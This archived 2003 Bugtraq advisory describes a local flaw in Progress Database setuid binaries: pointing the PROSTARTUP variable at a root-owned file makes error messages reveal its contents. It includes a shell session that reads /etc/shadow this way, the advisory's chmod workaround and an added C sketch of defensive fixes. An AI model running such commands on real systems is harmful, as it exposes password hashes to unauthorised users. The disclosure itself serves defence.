[29628] in bugtraq
SRT2003-04-02-1735 - Progress PROSTARTUP root owned file read
daemon@ATHENA.MIT.EDU (KF)
Thu Apr 3 17:49:53 2003
Message-ID: <3E8B1DB3.50504@snosoft.com>
Date: Wed, 02 Apr 2003 12:28:19 -0500
From: KF <dotslash@snosoft.com>
To: bugtraq@securityfocus.com
This data can be found at http://www.secnetops.biz/research
-KF
Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com
Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.
Quick Summary:
************************************************************************
Advisory Number : SRT2003-04-02-1735
Product : Progress Database
Version : Versions 7 to 9
Vendor : progress.com
Class : local
Criticality : Medium to Low
Operating System(s) : Linux, SunOS, SCO, TRU64, *nix
High Level Explanation
************************************************************************
High Level Description : Error messages can provide root owned data
What to do : chmod -s all suid binaries in /usr/dlc
Technical Details
************************************************************************
Proof Of Concept Status : No PoC is needed.
Low Level Description :
The Progress Database reads configuration files as the root user. No
checks are made to verify that the user running the program has the
permission to read the configuration file. A user can simply specify
a root owned file and cause an error message to be generated to view
the file contents. Most versions beyond v6 appear to be affected.
An example variable that can be abused is the PROSTARTUP variable.
bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)
bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs
bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)
bash-2.03$ /u/dlc8/bin/_mprosrv
17:37:20 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)
bash-2.03$ /u/dlc9/bin/_mprosrv
17:37:08 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)
Luckily, on the machine I chose to exploit, the line that was read from the
shadow file did not have an encrypted hash. This, however, is not always
the case.
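Added example, not Progress's code: a C sketch of the two defensive fixes the advisory implies for a setuid-root program that takes a startup-file path from the environment: open the file with the invoking user's real uid so the kernel enforces that user's permissions, and report a line number on a parse failure instead of echoing the unrecognised line. The option convention (every non-empty line begins with '-') and all function names are assumptions for illustration.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
/* Open a user-supplied path with the real (invoking) uid, not the effective
 * setuid-root uid, so the kernel enforces the caller's own permissions.
 * access(2) would also check the real uid but is racy (TOCTOU). */
int open_as_real_user(const char *path) {
    uid_t ruid = getuid(), euid = geteuid();
    if (euid != ruid && seteuid(ruid) != 0) return -1;
    int fd = open(path, O_RDONLY);
    int saved_errno = errno;
    if (euid != ruid && seteuid(euid) != 0) {   /* could not restore privilege */
        if (fd >= 0) close(fd);
        errno = EPERM;
        return -1;
    }
    errno = saved_errno;
    return fd;
}
/* Validate startup-file text. Assumed convention for this example: every
 * non-empty line is an option beginning with '-'. On failure the message
 * gives only the line number, never the offending text, so a misdirected
 * path cannot turn the error into a file-content oracle. */
int check_startup_text(const char *text, char *err, size_t errlen) {
    int line = 1;
    for (const char *p = text; *p; line++) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len > 0 && p[0] != '-') {
            snprintf(err, errlen, "** Could not recognize argument on line %d (301)", line);
            return -1;
        }
        if (!nl) break;
        p = nl + 1;
    }
    err[0] = '\0';
    return 0;
}
/* Read a startup file (first 4 KiB) as the invoking user, then validate it. */
int check_startup_file(const char *path, char *err, size_t errlen) {
    int fd = open_as_real_user(path);
    if (fd < 0) { snprintf(err, errlen, "** Cannot open %s (errno %d)", path, errno); return -1; }
    char buf[4096];
    ssize_t n = read(fd, buf, sizeof buf - 1); close(fd);
    if (n < 0) { snprintf(err, errlen, "** Cannot read %s", path); return -1; }
    buf[n] = '\0';
    return check_startup_text(buf, err, errlen);
}
```

Run as an unprivileged user the uid swap is a no-op; in a setuid-root binary it is what keeps a path like /etc/shadow unreadable to the caller.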
Patch or Workaround : chmod -s all suid binaries in the $DLC folder
Vendor Status : vendor has been notified and is working on a fix
Bugtraq URL : to be assigned
------------------------------------------------------------------------
This advisory was released by Secure Network Operations, Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.